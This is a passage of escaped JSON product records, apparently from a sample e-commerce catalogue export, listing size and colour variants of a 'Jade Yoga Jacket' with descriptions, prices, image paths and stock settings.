"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Gray\"},\"1272\":{\"sku\":\"WJ09-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Jade Yoga Jacket-XS-Green\",\"description\":\"<p><br \\/>If only all your other jackets were as comfortable as the relaxed-fit Jade Yoga Jacket, perfect for use during stretching, biking to and from studio or strolling on breezy fall days.<\\/p>\\n<p>&bull; Seafoam 1\\/4 zip pullover with purple stitching.<br \\/>&bull; Lightweight, quick-drying, water-resistant construction.<br \\/>&bull; Shirred details at front and back for a feminine look.<br \\/>&bull; Hood collapses into collar.<br \\/>&bull; Mesh liner for breathability.<br \\/>&bull; Front zip pockets.<br \\/>&bull; Hem cinches at sideseam.<br \\/>&bull; 100% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jade-yoga-jacket-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj09-green_alt1.jpg,\\/w\\/j\\/wj09-green_back.jpg\",\"image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj09-green_alt1.jpg,\\/w\\/j\\/wj09-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"1273\":{\"sku\":\"WJ09-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Jade Yoga Jacket-S-Blue\",\"description\":\"<p><br \\/>If only all your other jackets were as comfortable as the relaxed-fit Jade Yoga Jacket, perfect for use during stretching, biking to and from studio or strolling on breezy fall days.<\\/p>\\n<p>&bull; Seafoam 1\\/4 zip pullover with purple stitching.<br \\/>&bull; Lightweight, quick-drying, water-resistant construction.<br \\/>&bull; Shirred details at front and back for a feminine look.<br \\/>&bull; Hood collapses into collar.<br \\/>&bull; Mesh liner for breathability.<br \\/>&bull; Front zip pockets.<br \\/>&bull; Hem cinches at sideseam.<br \\/>&bull; 100% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jade-yoga-jacket-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1274\":{\"sku\":\"WJ09-S-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Jade Yoga Jacket-S-Gray\",\"description\":\"<p><br \\/>If only all your other jackets were as comfortable as the relaxed-fit Jade Yoga Jacket, perfect for use during stretching, biking to and from studio or strolling on breezy fall days.<\\/p>\\n<p>&bull; Seafoam 1\\/4 zip pullover with purple stitching.<br \\/>&bull; Lightweight, quick-drying, water-resistant construction.<br \\/>&bull; Shirred details at front and back for a feminine look.<br \\/>&bull; Hood collapses into collar.<br \\/>&bull; Mesh liner for breathability.<br \\/>&bull; Front zip pockets.<br \\/>&bull; Hem cinches at sideseam.<br \\/>&bull; 100% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jade-yoga-jacket-s-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Gray\"},\"1275\":{\"sku\":\"WJ09-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Jade Yoga Jacket-S-Green\",\"description\":\"<p><br \\/>If only all your other jackets were as comfortable as the relaxed-fit Jade Yoga Jacket, perfect for use during stretching, biking to and from studio or strolling on breezy fall days.<\\/p>\\n<p>&bull; Seafoam 1\\/4 zip pullover with purple stitching.<br \\/>&bull; Lightweight, quick-drying, water-resistant construction.<br \\/>&bull; Shirred details at front and back for a feminine look.<br \\/>&bull; Hood collapses into collar.<br \\/>&bull; Mesh liner for breathability.<br \\/>&bull; Front zip pockets.<br \\/>&bull; Hem cinches at sideseam.<br \\/>&bull; 100% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jade-yoga-jacket-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj09-green_alt1.jpg,\\/w\\/j\\/wj09-green_back.jpg\",\"image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj09-green_alt1.jpg,\\/w\\/j\\/wj09-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"1276\":{\"sku\":\"WJ09-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Jade Yoga Jacket-M-Blue\",\"description\":\"<p><br \\/>If only all your other jackets were as comfortable as the relaxed-fit Jade Yoga Jacket, perfect for use during stretching, biking to and from studio or strolling on breezy fall days.<\\/p>\\n<p>&bull; Seafoam 1\\/4 zip pullover with purple stitching.<br \\/>&bull; Lightweight, quick-drying, water-resistant construction.<br \\/>&bull; Shirred details at front and back for a feminine look.<br \\/>&bull; Hood collapses into collar.<br \\/>&bull; Mesh liner for breathability.<br \\/>&bull; Front zip pockets.<br \\/>&bull; Hem cinches at sideseam.<br \\/>&bull; 100% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jade-yoga-jacket-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1277\":{\"sku\":\"WJ09-M-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Jade Yoga Jacket-M-Gray\",\"description\":\"<p><br \\/>If only all your other jackets were as comfortable as the relaxed-fit Jade Yoga Jacket, perfect for use during stretching, biking to and from studio or strolling on breezy fall days.<\\/p>\\n<p>&bull; Seafoam 1\\/4 zip pullover with purple stitching.<br \\/>&bull; Lightweight, quick-drying, water-resistant construction.<br \\/>&bull; Shirred details at front and back for a feminine look.<br \\/>&bull; Hood collapses into collar.<br \\/>&bull; Mesh liner for breathability.<br \\/>&bull; Front zip pockets.<br \\/>&bull; Hem cinches at sideseam.<br \\/>&bull; 100% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jade-yoga-jacket-m-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Gray\"},\"1278\":{\"sku\":\"WJ09-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Jade Yoga Jacket-M-Green\",\"description\":\"<p><br \\/>If only all your other jackets were as comfortable as the relaxed-fit Jade Yoga Jacket, perfect for use during stretching, biking to and from studio or strolling on breezy fall days.<\\/p>\\n<p>&bull; Seafoam 1\\/4 zip pullover with purple stitching.<br \\/>&bull; Lightweight, quick-drying, water-resistant construction.<br \\/>&bull; Shirred details at front and back for a feminine look.<br \\/>&bull; Hood collapses into collar.<br \\/>&bull; Mesh liner for breathability.<br \\/>&bull; Front zip pockets.<br \\/>&bull; Hem cinches at sideseam.<br \\/>&bull; 100% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jade-yoga-jacket-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj09-green_alt1.jpg,\\/w\\/j\\/wj09-green_back.jpg\",\"image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj09-green_alt1.jpg,\\/w\\/j\\/wj09-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"1279\":{\"sku\":\"WJ09-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Jade Yoga Jacket-L-Blue\",\"description\":\"<p><br \\/>If only all your other jackets were as comfortable as the relaxed-fit Jade Yoga Jacket, perfect for use during stretching, biking to and from studio or strolling on breezy fall days.<\\/p>\\n<p>&bull; Seafoam 1\\/4 zip pullover with purple stitching.<br \\/>&bull; Lightweight, quick-drying, water-resistant construction.<br \\/>&bull; Shirred details at front and back for a feminine look.<br \\/>&bull; Hood collapses into collar.<br \\/>&bull; Mesh liner for breathability.<br \\/>&bull; Front zip pockets.<br \\/>&bull; Hem cinches at sideseam.<br \\/>&bull; 100% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jade-yoga-jacket-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1280\":{\"sku\":\"WJ09-L-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default 